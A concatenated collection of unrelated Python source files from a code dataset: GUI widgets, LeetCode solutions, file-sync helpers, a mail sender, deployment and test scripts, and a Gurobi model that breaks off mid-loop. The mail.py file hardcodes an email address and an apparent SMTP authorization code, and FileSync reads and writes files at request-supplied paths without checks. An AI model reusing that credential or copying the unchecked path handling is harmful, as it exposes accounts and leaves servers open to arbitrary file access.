painter.setPen(Qt.black)\n painter.drawText(-2, top, self.lineNumberArea.width(),\n self.fontMetrics().height(),\n Qt.AlignRight, number)\n block = block.next()\n top = bottom\n bottom = top + self.blockBoundingRect(block).height()\n block_number += 1\n\n def line_number_area_width(self):\n digits = len(str(self.blockCount()))\n space = 3 + self.fontMetrics().width(\"9\") * digits\n return space\n\n def resizeEvent(self, event):\n QPlainTextEdit.resizeEvent(self, event)\n cr = self.contentsRect()\n self.lineNumberArea.setGeometry(QRect(cr.left(), cr.top(), self.line_number_area_width(), cr.height()))\n\n @pyqtSlot(int)\n def updateline_number_area_width(self, new_block_count):\n self.setViewportMargins(self.line_number_area_width(), 0, 0, 0)\n\n @pyqtSlot()\n def highlight_current_line(self):\n extra_selections = []\n selection = QTextEdit.ExtraSelection()\n line_color = QColor(Qt.green).lighter(170)\n selection.format.setBackground(line_color)\n selection.format.setProperty(QTextFormat.FullWidthSelection, True)\n selection.cursor = self.textCursor()\n selection.cursor.clearSelection()\n extra_selections.append(selection)\n self.setExtraSelections(extra_selections)\n\n @pyqtSlot(QRect, int)\n def update_line_number_area(self, rect, dy):\n if dy:\n self.lineNumberArea.scroll(0, dy)\n else:\n self.lineNumberArea.update(0, rect.y(), self.lineNumberArea.width(), rect.height())\n if rect.contains(self.viewport().rect()):\n 
self.updateline_number_area_width(0)\n","sub_path":"Quellcode/codeeditor.py","file_name":"codeeditor.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"71877138","text":"# Given a binary search tree (BST) with duplicates, \n# find all the mode(s) (the most frequently occurred element) in the given BST.\n\n# Assume a BST is defined as follows:\n\n# The left subtree of a node contains only nodes with keys less than or equal to the node's key.\n# The right subtree of a node contains only nodes with keys greater than or equal to the node's key.\n# Both the left and right subtrees must also be binary search trees.\n# For example:\n# Given BST [1,null,2,2],\n#    1\n#     \\\n#      2\n#     /\n#    2\n# return [2].\n\n# Note: If a tree has more than one mode, you can return them in any order.\n\n# Follow up: Could you do that without using any extra space? \n# (Assume that the implicit stack space incurred due to recursion does not count).\n\nimport collections\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution(object):\n    def findMode(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: List[int]\n        \"\"\"\n        stack, cnt, prev, max_cnt, mode = [], 0, None, 0, []\n        while stack or root:\n            if root:\n                stack.append(root)\n                root = root.left\n            else:\n                root = stack.pop()\n                if prev is None:\n                    prev = root.val\n                    cnt = 1\n                elif prev != root.val:\n                    cnt = 1\n                    prev = root.val\n                else:\n                    cnt += 1\n                if cnt > max_cnt:\n                    max_cnt = cnt\n                    mode = [prev]\n                elif cnt == max_cnt:\n                    mode.append(root.val)\n                root = root.right\n        return mode\n    \nclass Solution(object):\n    def findMode(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: List[int]\n        \"\"\"\n        counter = collections.Counter()\n        def dfs(root):\n            if not root: return\n            counter[root.val] += 1\n            dfs(root.left)\n            dfs(root.right)\n        dfs(root)\n        maxn = max(counter.values()+[None])\n        \n        return [e for e, v in counter.items() if v == maxn]\n    \n\nfrom collections import Counter\nclass Solution(object):\n    def findMode(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: List[int]\n        \"\"\"\n        if not root: return []\n        nums = Counter(self.help_(root))\n        max_value = nums.most_common(1)[0][1]\n        return [key for key, value in nums.items() if value==max_value]\n    \n    def help_(self, root):\n        if not root: return []\n        return self.help_(root.left) + [root.val] + self.help_(root.right)\n    \n    \nclass Solution(object):\n    def findMode(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: List[int]\n        \"\"\"\n        if not root:\n            return []\n        count = collections.defaultdict(int)\n        def preorder(root):\n            if root:\n\n                count[root.val] += 1\n                preorder(root.left)\n                preorder(root.right)\n        preorder(root)\n        max_occ = max(count.values())\n        return [k for k in count if 
count[k] == max_occ]\n","sub_path":"LEETCODE/0501. Find Mode in Binary Search Tree.py","file_name":"0501. Find Mode in Binary Search Tree.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"648801282","text":"'''\nCreated on Feb 22, 2013\n\n@author: Ken\n'''\nimport os\nimport hashlib\n\ndef hashfile(afile, hasher, blocksize=65536):\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(blocksize)\n return hasher.digest()\n\ndef get_file_checksum( filepath, hasher ):\n blocksize = 65536\n fd = open(filepath, 'rb')\n buf = fd.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = fd.read(blocksize)\n return hasher.hexdigest()\n \ndef put_file( path, content_type, file_data):\n if content_type.find('text') == -1:\n mode = 'wb+'\n else:\n mode = 'w+'\n fd = open(path, mode)\n fd.write(file_data)\n fd.close()\n return '200 OK'\n \ndef get_file_list( path, ext=None ):\n file_list = []\n dir_list = os.listdir(path)\n for file_name in dir_list:\n if not os.path.isdir(path + file_name):\n if ext != None:\n if file_name.endswith(ext):\n file_list.append(file_name)\n else:\n file_list.append(file_name)\n return file_list\n\ndef get_file_list_with_checksum( path, ext=None ):\n file_list = []\n dir_list = os.listdir(path)\n for file_name in dir_list:\n if not os.path.isdir(path + file_name):\n if ext != None:\n if file_name.endswith(ext):\n file_checksum = get_file_checksum( path + file_name, hashlib.md5() )\n file_list.append(file_name + ':' + str(file_checksum))\n else:\n file_checksum = get_file_checksum( path + file_name, hashlib.md5() )\n file_list.append(file_name + ':' + str(file_checksum))\n return file_list\n\ndef get_file(path):\n file_data = ''\n try:\n if path.find('.jpg') != -1:\n fd = open(path, 'rb')\n file_data = fd.read()\n elif path.find('.apk') != -1:\n fd = open(path, 'rb')\n file_data = fd.read()\n else:\n file_data = ''\n fd = open(path, 'r')\n for line in fd:\n file_data += line\n fd.close()\n except:\n pass\n return file_data\n \ndef get(global_config, path, with_checksum=False):\n \n # if the requested path starts with 'static', then let's assume that\n # the request knows the full path that it's looking for, otherwise, \n # we will prepend the path with the path to the data directory\n if path.startswith('static'):\n fullpath = './' + path\n else: \n fullpath = './static/data/' + path\n \n # if the path refers to a directory, then return the list of files in the directory\n # otherwise, return the contents of the file\n if os.path.isdir(fullpath):\n if with_checksum is False:\n file_list = get_file_list(fullpath)\n else:\n file_list = get_file_list_with_checksum(fullpath)\n response_body = ''\n for file_name in file_list:\n response_body += file_name + '\\n'\n else:\n response_body = get_file(fullpath)\n return response_body\n\ndef put(global_config, path, content_type, msg_body):\n \n # if the requested path starts with 'static', then let's assume that\n # the request knows the full path that it's looking for, otherwise, \n # we will prepend the path with the path to the data directory\n if path.startswith('static'):\n fullpath = './' + path\n else: \n fullpath = './static/data/' + path\n\n # make sure that the destination directory exists\n if not os.path.exists(os.path.dirname(fullpath)):\n os.makedirs(os.path.dirname(fullpath))\n \n put_file(fullpath, content_type, 
msg_body)\n\n\n","sub_path":"CentralApp/src/FileSync.py","file_name":"FileSync.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"161245787","text":"\"\"\"\n1. 定义“动物”、“猫”、“动物园”三个类,动物类不允许被实例化。\n2. 动物类要求定义“类型”、“体型”、“性格”、“是否属于凶猛动物”四个属性,是否属于凶猛动物的判断标准是:“体型 >= 中等”并且是“食肉类型”同时“性格凶猛”。\n3. 猫类要求有“叫声”、“是否适合作为宠物”以及“名字”三个属性,其中“叫声”作为类属性,猫类继承自动物类。\n4. 动物园类要求有“名字”属性和“添加动物”的方法,“添加动物”方法要实现同一只动物(同一个动物实例)不能被重复添加的功能。\n\"\"\"\n\nfrom abc import ABCMeta\n\n\nclass Zoo(object):\n \"\"\"\n Zoo 动物园\n \"\"\"\n __instance = False\n list_animal = []\n\n def __new__(cls, *args, **kwargs):\n if cls.__instance:\n return cls.__instance\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\n def __init__(self, name):\n self.name = name\n\n def add_animal(self, animal):\n if animal not in self.list_animal:\n self.list_animal.append(animal)\n else:\n # return self.list_animal[animal]\n print('已经存在')\n\n def __getattr__(self, item):\n \"\"\"\n 动物园是否有 item 这种动物\n :param item:动物某子类名\n :return:\n \"\"\"\n try:\n for animal in self.list_animal:\n if isinstance(animal, eval(item)):\n return True\n except:\n pass\n return False\n\n\nclass Animal(metaclass=ABCMeta):\n \"\"\"\n Animal 动物\n \"\"\"\n\n def __init__(self, types, shape, character):\n \"\"\"\n\n :param types:类型\n :param shape:体型 (假设体型有 大 中 小 三类,分别对应 3 ,2, 1,体型 >= 中等,表示为 非小)\n :param character:性格\n \"\"\"\n self.types = types\n self.shape = shape\n self.character = character\n\n if shape != '小' and types == '食肉' and character == '凶猛':\n self.isdanger = True\n else:\n self.isdanger = False\n\n\nclass Cat(Animal):\n \"\"\"\n Cat 猫\n \"\"\"\n\n # __instance_cat = False\n # list_animal = []\n #\n # def __new__(cls, *args, **kwargs):\n # if cls.__instance_cat:\n # return cls.__instance_cat\n # cls.v = object.__new__(cls)\n # return cls.__instance_cat\n\n def __init__(self, name, types, shape, character, ispet=True):\n \"\"\"\n\n :param name: 名字\n :param types: 类型\n :param shape: 体型\n :param character:性格\n :param ispet: 是否适合做宠物\n :return:\n \"\"\"\n self.name = name\n self.ispet = ispet\n super().__init__(types, shape, character)\n\n @property\n def bark(self):\n \"\"\"\n 猫 \"叫\"\n :return:\n \"\"\"\n print('tha Cat bark.')\n\n\nif __name__ == '__main__':\n # 实例化动物园\n z = Zoo('时间动物园')\n # 实例化一只猫,属性包括名字、类型、体型、性格\n cat1 = Cat('大花猫 1', '食肉', '小', '温顺')\n # 增加一只猫到动物园\n z.add_animal(cat1)\n # 动物园是否有猫这种动物\n have_cat = getattr(z, 'Cat')\n print('have_cat:', have_cat)\n","sub_path":"week07/zoofeed.py","file_name":"zoofeed.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"595680138","text":"__author__ = 'Mingjieshao'\n\ndef laceStrings(s1, s2):\n \"\"\"\n s1 and s2 are strings.\n\n Returns a new str with elements of s1 and s2 interlaced,\n beginning with s1. 
If strings are not of same length,\n    then the extra elements should appear at the end.\n    \"\"\"\n    # Your Code Here\n    stringLen = max(len(s1),len(s2))\n    str = \"\"\n\n    for i in range(stringLen):\n        if i < len(s1):\n            str+=s1[i]\n        if i < len(s2):\n            str+=s2[i]\n\n    return str\n\nprint(laceStrings(\"abcd\",\"efghi\"))\n\n","sub_path":"Mid-Exam/Problem5.py","file_name":"Problem5.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"413147786","text":"import smtplib\r\nfrom os import path\r\nimport os\r\nfrom email.header import Header\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import parseaddr, formataddr\r\n\r\n\r\nclass SendMail(object):\r\n    smtp_server = \"smtp.qq.com\"\r\n    password = \"fkgngrwblphqdjah\"\r\n    # from_addr = \"qq2509934810@163.com\"\r\n    from_addr = \"2509934810@qq.com\"\r\n\r\n\r\n    def __init__(self, text, sender, receiver, subject, address):\r\n        self.text = text\r\n        self.sender = sender\r\n        self.receiver = receiver\r\n        self.subject = subject\r\n        self.address = address\r\n        self.to_addr = address\r\n\r\n        self.msg = MIMEText(self.text, \"plain\", \"utf-8\")\r\n        self.msg[\"From\"] = self._format_addr(self.sender + \"<\" + self.from_addr + \">\")\r\n        self.msg[\"To\"] = self._format_addr(self.receiver + \"<\" + self.to_addr + \">\")\r\n        self.msg[\"Subject\"] = Header(self.subject, \"utf-8\").encode()\r\n\r\n    def _format_addr(self, addr):\r\n        name, addr = parseaddr(addr)\r\n        return formataddr((Header(name, \"utf-8\").encode(), addr))\r\n\r\n    def send(self):\r\n        server = smtplib.SMTP_SSL(self.smtp_server, 465)\r\n        # server.set_debuglevel(1)\r\n        server.login(\"2509934810@qq.com\", \"fkgngrwblphqdjah\")\r\n        server.sendmail(\"2509934810@qq.com\", [self.to_addr], self.msg.as_string())\r\n        server.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    client = SendMail(\r\n        text=\"我是 小类 嘻嘻嘻\",\r\n        sender=\"qq2509934810@163.com\",\r\n        receiver=\"mr zhang\",\r\n        subject=\"authentical_email\",\r\n        address=\"2509934810@qq.com\",\r\n    )\r\n    client.send()\r\n","sub_path":"backend/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"653232604","text":"from environment import Environment\nfrom nes_py.wrappers import BinarySpaceToDiscreteSpaceEnv\nimport gym_super_mario_bros\nfrom gym_super_mario_bros.actions import SIMPLE_MOVEMENT\nimport cv2\nimport numpy as np\n\nclass MarioEnvironment(Environment) :\n\n    def __init__(self,game,resized_height=0,resized_width=0,use_pixels=True) :\n        self.game = game\n        self.resized_height = resized_height\n        self.resized_width = resized_width\n        self.use_pixels = use_pixels\n        self.input_size = None\n        self.output_size = None\n    \n    def render(self) :\n        self.env.render()\n\n    def initialize(self) :\n        self.env = gym_super_mario_bros.make(self.game)\n        self.env = BinarySpaceToDiscreteSpaceEnv(self.env, SIMPLE_MOVEMENT)\n\n    def clone(self) :\n        return MarioEnvironment(self.game,self.resized_height,self.resized_width,self.use_pixels)\n\n    def getInputSize(self) :\n        if(self.input_size is None) :\n            if(self.use_pixels) :\n                self.input_size = self.resized_height * self.resized_width\n            else :\n                self.initialize()\n                self.input_size = self.env.observation_space.shape[0]\n                self.close()\n\n        return self.input_size\n\n    def getOutputSize(self) :\n        if(self.output_size is None) :\n            self.initialize()\n            if(self.use_pixels) :\n                self.output_size = 
self.env.action_space.n\n else :\n self.output_size = self.env.action_space.shape[0]\n self.close()\n return self.output_size\n\n def reset(self) :\n return self.env.reset()\n\n def step(self,action) :\n return self.env.step(action)\n \n def preprocess(self,state) :\n if(self.use_pixels) :\n frame = cv2.resize(state,(self.resized_width,self.resized_height))\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n return frame.reshape([self.resized_width * self.resized_height])\n return state\n\n def actionProcessor(self,action) :\n if(self.use_pixels) :\n return np.argmax(action)\n return action\n\n def close(self) :\n self.env.close()","sub_path":"NEAT/mario_environment.py","file_name":"mario_environment.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649866776","text":"import provFs\nimport tempfile\nimport os\nimport time\nimport rcExceptions as ex\nfrom rcUtilities import which, justcall, lazy\nfrom rcBtrfs import Btrfs\n\nclass Prov(provFs.Prov):\n info = ['btrfs', 'device', 'ready']\n\n @lazy\n def mkfs(self):\n return ['mkfs.btrfs', '-f', '-L', self.label]\n\n @lazy\n def raw_label(self):\n return '{name}.' + self.r.rid.replace(\"#\", \".\")\n\n @lazy\n def label(self):\n return self.r.svc.name + '.' + self.r.rid.replace(\"#\", \".\")\n\n def is_provisioned(self):\n ret = provFs.Prov.is_provisioned(self)\n if not ret:\n return ret\n if self.subvol is None:\n return ret\n mnt = tempfile.mkdtemp()\n self.mount(mnt)\n try:\n btrfs = Btrfs(path=mnt)\n return btrfs.has_subvol(self.subvol)\n finally:\n self.cleanup(mnt)\n\n def current_label(self, mnt):\n cmd = [\"btrfs\", \"filesystem\", \"label\", mnt]\n ret, out, err = self.r.call(cmd, errlog=False)\n if ret == 0 and len(out.strip()) > 0:\n return out.strip()\n\n @lazy\n def subvol(self):\n l = self.r.mount_options.split(\",\")\n for e in l:\n if not e.startswith(\"subvol=\"):\n continue\n subvol = e.replace(\"subvol=\", \"\")\n return subvol\n\n def cleanup(self, mnt):\n cmd = [\"umount\", mnt]\n self.r.vcall(cmd)\n os.removedirs(mnt)\n\n def write_label(self, mnt):\n current_label = self.current_label(mnt)\n if current_label is not None:\n label = current_label\n raw_label = current_label.replace(self.r.svc.name, \"{name}\")\n else:\n label = self.label\n raw_label = self.raw_label\n self.r.svc.set_multi([\"%s.dev=%s\" % (self.r.rid, \"LABEL=\"+raw_label)])\n self.r.unset_lazy(\"device\")\n self.wait_label(label)\n\n def wait_label(self, label):\n if which(\"findfs\") is None:\n self.r.log.info(\"findfs program not found, wait arbitrary 20 seconds for label to be usable\")\n time.sleep(20)\n cmd = [\"findfs\", \"LABEL=\"+label]\n for i in range(20):\n out, err, ret = justcall(cmd)\n self.r.log.debug(\"%s\\n%s\\n%s\" % (\" \".join(cmd), out, err))\n if ret == 0:\n return\n self.r.log.info(\"label is not usable yet (%s)\" % err.strip())\n time.sleep(2)\n raise ex.excError(\"timeout waiting for label to become usable\")\n\n def mount(self, mnt):\n self.r.set_loopdevice()\n if self.r.loopdevice is None:\n device = self.r.device\n else:\n device = self.r.loopdevice\n cmd = [\"mount\", \"-t\", \"btrfs\", \"-o\", \"subvolid=0\", device, mnt]\n ret, out, err = self.r.vcall(cmd)\n if ret != 0:\n raise ex.excError\n\n def create_subvol(self):\n if self.subvol is None:\n return\n mnt = tempfile.mkdtemp()\n self.mount(mnt)\n try:\n self.write_label(mnt)\n self._create_subvol(mnt)\n self.r.log.info(\"subvolume %s provisioned\" % self.subvol)\n 
self.r.start()\n finally:\n self.cleanup(mnt)\n\n def _create_subvol(self, mnt):\n path = os.path.join(mnt, self.subvol)\n if os.path.exists(path):\n return\n cmd = [\"btrfs\", \"subvol\", \"create\", path]\n ret, out, err = self.r.vcall(cmd)\n if ret != 0:\n raise ex.excError\n\n def provisioner(self):\n if self.r.device.startswith(\"LABEL=\") or self.r.device.startswith(\"UUID=\"):\n self.r.log.info(\"skip formatting because dev is specified by LABEL or UUID\")\n else:\n provFs.Prov.provisioner_fs(self)\n self.create_subvol()\n\n\n\n","sub_path":"lib/provFsBtrfs.py","file_name":"provFsBtrfs.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"318805425","text":"import os\nimport math\nfrom random import randint\n\njump = [12]\ncut = [2]\nsteps = []\nchangeJumpTop = 24\nchangeJumpBot = 7\n\ndef changeJump(oldJump):\n\tincDec = randint(0,1)\n\tif (incDec == 0):\n\t\tnewJump = oldJump - randint(changeJumpBot,changeJumpTop)\n\telif (incDec == 1):\n\t\tnewJump = oldJump + randint(changeJumpBot,changeJumpTop)\n\twhile (newJump < 1):\n\t\tnewJump += randint(changeJumpBot,changeJumpTop)\n\twhile (newJump >= 64):\n\t\tnewJump -= randint(changeJumpBot,changeJumpTop)\n\tjump.append(newJump)\n\ndef changeCut(oldCut):\n\tnewCut = int(randint(2,21))\n\tcut.append(newCut)\n\ndef findFirstNumber(bot, top, num, numNums):\n\tfor n in range(numNums):\n\t\tcurrentSteps = 0\n\t\tcurrentNumber = bot + 1 - 1\n\t\tcurrentJump = jump[n] + 1 - 1\n\t\twhile (currentNumber != num):\n\t\t\twhile (currentNumber < num):\n\t\t\t\t#print(currentNumber)\n\t\t\t\tcurrentNumber += currentJump\n\t\t\t\tcurrentSteps += 1\n\t\t\tcurrentJump = int(currentJump/cut[n])\n\t\t\tif (currentJump == 0):\n\t\t\t\tcurrentJump = 1\n\t\t\twhile (currentNumber > num):\n\t\t\t\t#print(currentNumber)\n\t\t\t\tcurrentNumber -= currentJump\n\t\t\t\tcurrentSteps += 1\n\t\t\tcurrentJump = int(currentJump/cut[n])\n\t\t\tif (currentJump == 0):\n\t\t\t\tcurrentJump = 1\n\t\tsteps.append(currentSteps)\n\t\tchangeJump(jump[n])\n\t\tchangeCut(cut[n])\n\tprint(\"Number (\" + str(currentNumber) + \") found: Jump: \" + str(jump[n]) + \" Cut: \" + str(cut[n]) + \" Steps: \" + str(steps[n]))\n\ndef findNextNumber(bot, top, num):\n\tcurrentSteps = 0\n\tcurrentNumber = bot + 1 - 1\n\tcurrentJump = jump[i] + 1 - 1\n\twhile (currentNumber != num):\n\t\twhile (currentNumber < num):\n\t\t\tcurrentNumber += currentJump\n\t\t\tcurrentSteps += 1\n\t\tcurrentJump = int(currentJump/cut[i])\n\t\tif (currentJump == 0):\n\t\t\tcurrentJump = 1\n\t\twhile (currentNumber > num):\n\t\t\tcurrentNumber -= currentJump\n\t\t\tcurrentSteps += 1\n\t\tcurrentJump = int(currentJump/cut[i])\n\t\tif (currentJump == 0):\n\t\t\tcurrentJump = 1\n\tsteps[i] += currentSteps\n\ndef findNumbers(numNums, trials):\n\tfindFirstNumber(0, 100, 53, numNums)\n\tglobal i\n\tfor i in range(numNums):\n\t\tfor k in range(trials-1):\n\t\t\trandTop = randint(100, 100000)\n\t\t\trandNum = randTop - randint(0, randTop-100)\n\t\t\tfindNextNumber(0, randTop, randNum)\n\t\tprint(\"Numbers found: Jump: \" + str(jump[i]) + \" Cut: \" + str(cut[i]) + \" Steps: \" + str(steps[i]))\n\n\nfindNumbers(24, 200)","sub_path":"songa.py","file_name":"songa.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"342422307","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 
18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/reviewboard/extensions/templatetags/rb_extensions.py\n# Compiled at: 2020-02-11 04:03:56\nfrom __future__ import unicode_literals\nimport logging\nfrom django import template\nfrom django.template.loader import render_to_string\nfrom reviewboard.extensions.hooks import CommentDetailDisplayHook, HeaderActionHook, HeaderDropdownActionHook, NavigationBarHook\nfrom reviewboard.site.urlresolvers import local_site_reverse\nregister = template.Library()\n\ndef action_hooks(context, hook_cls, action_key=b'action', template_name=b'extensions/action.html'):\n \"\"\"Displays all registered action hooks from the specified ActionHook.\"\"\"\n html = []\n for hook in hook_cls.hooks:\n try:\n for actions in hook.get_actions(context):\n if actions:\n context.push()\n context[action_key] = actions\n try:\n html.append(render_to_string(template_name, context))\n except Exception as e:\n logging.error(b'Error when rendering template for action \"%s\" for hook %r in extension \"%s\": %s', action_key, hook, hook.extension.id, e, exc_info=1)\n\n context.pop()\n\n except Exception as e:\n logging.error(b'Error when running get_actions() on hook %r in extension \"%s\": %s', hook, hook.extension.id, e, exc_info=1)\n\n return (b'').join(html)\n\n\n@register.simple_tag(takes_context=True)\ndef navigation_bar_hooks(context):\n \"\"\"Displays all registered navigation bar entries.\"\"\"\n html = []\n for hook in NavigationBarHook.hooks:\n try:\n for nav_info in hook.get_entries(context):\n if nav_info:\n url_name = nav_info.get(b'url_name', None)\n if url_name:\n nav_info[b'url'] = local_site_reverse(url_name, request=context.get(b'request'))\n context.push()\n context[b'entry'] = nav_info\n html.append(render_to_string(b'extensions/navbar_entry.html', context))\n context.pop()\n\n except Exception as e:\n extension = hook.extension\n logging.error(b'Error when running NavigationBarHook.get_entries function in extension: \"%s\": %s', extension.id, e, exc_info=1)\n\n return (b'').join(html)\n\n\n@register.simple_tag(takes_context=True)\ndef header_action_hooks(context):\n \"\"\"Displays all single-entry action hooks for the header bar.\"\"\"\n return action_hooks(context, HeaderActionHook)\n\n\n@register.simple_tag(takes_context=True)\ndef header_dropdown_action_hooks(context):\n \"\"\"Displays all multi-entry action hooks for the header bar.\"\"\"\n return action_hooks(context, HeaderDropdownActionHook, b'actions', b'extensions/header_action_dropdown.html')\n\n\n@register.simple_tag(takes_context=True)\ndef comment_detail_display_hook(context, comment, render_mode):\n \"\"\"Displays all additional detail from CommentDetailDisplayHooks.\"\"\"\n assert render_mode in ('review', 'text-email', 'html-email')\n html = []\n for hook in CommentDetailDisplayHook.hooks:\n try:\n if render_mode == b'review':\n html.append(hook.render_review_comment_detail(comment))\n elif render_mode in ('text-email', 'html-email'):\n html.append(hook.render_email_comment_detail(comment, render_mode == b'html-email'))\n except Exception as e:\n extension = hook.extension\n logging.error(b'Error when running CommentDetailDisplayHook with render mode \"%s\" in extension: %s: %s', render_mode, extension.id, e, exc_info=1)\n\n return 
(b'').join(html)","sub_path":"pycfiles/ReviewBoard-3.0.17-py2.7/rb_extensions.py","file_name":"rb_extensions.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"57531179","text":"__author__ = 'rohanarora'\nfrom fabric.api import cd, env, task\nfrom fabric.operations import sudo, run, reboot\n\n\n# to be called on a fresh instance\n@task\ndef start_fresh():\n install_os_dependencies()\n clone_repo()\n run_doxygen()\n move_to_var_html()\n restart_apache()\n\n\n# to be called to update the documentation\n@task\ndef update():\n git_pull()\n run_doxygen()\n move_to_var_html()\n restart_apache()\n\n\n# install apache2, git, doxygen\n@task\ndef install_os_dependencies():\n packages = [\n 'apache2',\n 'git',\n 'doxygen',\n ]\n sudo('apt-get update')\n sudo('apt-get upgrade')\n reboot(120)\n sudo('apt-get -y install %s' % ' '.join(packages))\n run('git config --global url.\"https://\".insteadOf git://')\n\n\n# clones the repository\n@task\ndef clone_repo():\n run('git clone -b %s %s %s' % (env.repository_branch, env.repository_github_url, env.doxygen_root))\n\n\n# run the doxygen command\n@task\ndef run_doxygen():\n with cd(env.doxygen_root):\n run('doxygen Doxyfile')\n\n\n# update the repo; use the token as the user name; password would be blank\n@task\ndef git_pull():\n with cd(env.doxygen_root):\n run('git pull origin %s' % (env.repository_branch))\n\n\n# moves the contents of DeployingDoxygen(your repo.)/html [generated after running the doxygen command] to /var/www/html and updating permissions\n@task\ndef move_to_var_html():\n with cd(env.doxygen_root):\n sudo('cp -r * /var/www/html')\n sudo('chown -R $USER:$USER /var/www/html')\n sudo('chmod -R 755 /var/www')\n\n\n# restart apache server after making changes to config. 
files\n@task\ndef restart_apache():\n sudo('service apache2 restart')\n","sub_path":"documentation_server_setup.py","file_name":"documentation_server_setup.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"622088623","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/11/24 11:45\n# @Author : Leo_Peng\n# @File : Case_Run.py\n# @Software: PyCharm\n#import unittest\nfrom public.Suites import *\nfrom public import HTMLTestRunner\nimport os,time\npath=os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\ncase_path =path+'/TestCase'\nresult =path+'/Result/'\ndef Creatsuite():\n #定义单元测试容器\n testunit = Suit()\n\n #定搜索用例文件的方法\n discover = unittest.defaultTestLoader.discover(case_path, pattern='Test_*.py', top_level_dir=None)\n\n #将测试用例加入测试容器中\n for test_suite in discover:\n for casename in test_suite:\n testunit.addTest(casename)\n return testunit\n\ntest_case = Creatsuite()\n\n#获取系统当前时间\nnow = time.strftime('%Y-%m-%d-%H_%M_%S', time.localtime(time.time()))\nday = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n\n#定义个报告存放路径,支持相对路径\ntdresult = result + day\nif os.path.exists(tdresult):\n filename = tdresult + \"\\\\\" + now + \"_result.html\"\n fp = open(filename, 'wb')\n #定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, verbosity=2, title=u'Appium测试报告', description=u'用例详情:')\n\n #运行测试用例\n runner.run(test_case)\n fp.close() #关闭报告文件\nelse:\n os.mkdir(tdresult)\n filename = tdresult + \"\\\\\" + now + \"_result.html\"\n fp = open(filename, 'wb')\n #定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, verbosity=2, title=u'Appium测试报告', description=u'用例详情:')\n\n #运行测试用例\n runner.run(test_case)\n fp.close() #关闭报告文件\n","sub_path":"public/Case_Run.py","file_name":"Case_Run.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"124342530","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 25 14:09:15 2021\n\n@author: Pooja\n\"\"\"\n\nimport gurobipy as gp\nfrom gurobipy import GRB\nimport numpy as np\nimport pandas as pd\n\n\n# indices and parameters\n\nnum_pod_sites = 47\nnum_blocks = 1100\n\npod_sites = range(num_pod_sites)\nblocks = range(num_blocks)\n\nhoursOpen = 12\npeoplePerCar = 3\ncarsPerHour = 6\n\ndistance = pd.read_csv('Distances.csv', header=None, sep=',')\n\npopulation = pd.read_csv('Populations.csv', header=None, sep=',')\npopulation = population.astype(float)\n\nloadingSites = pd.read_csv('LoadingSites.csv', header=None, sep=',')\ncapacity = loadingSites * hoursOpen * peoplePerCar * carsPerHour\n\nsupplies = pd.read_csv('Supplies.csv', header=None, sep=',')\nlabor = pd.read_csv('Labor.csv', header=None, sep=',')\ncost = labor + (supplies.sum()*loadingSites*hoursOpen*carsPerHour)\n\nbudget = 1000000000000\n\n\n####### MODEL 1\nm1 = gp.Model()\n\n\n# Decision variables\nx1 = m1.addVars(pod_sites, vtype=GRB.BINARY)\ny1 = m1.addVars(pod_sites, blocks, vtype=GRB.BINARY)\n\n# Objective function\nm1.modelSense = GRB.MINIMIZE\nm1.setObjective(sum(sum(distance.iloc[k, i]*population.iloc[k]*y1[i,k] for i in pod_sites) for k in blocks))\n\n\n# Constraints\n\n## all pod sites are bounded by a given capacity\nfor i in pod_sites:\n m1.addConstr(sum(y1[i, k]*population.iloc[k] for k in blocks) <= capacity.iloc[i]*x1[i])\n\n## each block is assigned to exactly 1 pod site\nfor k in blocks:\n 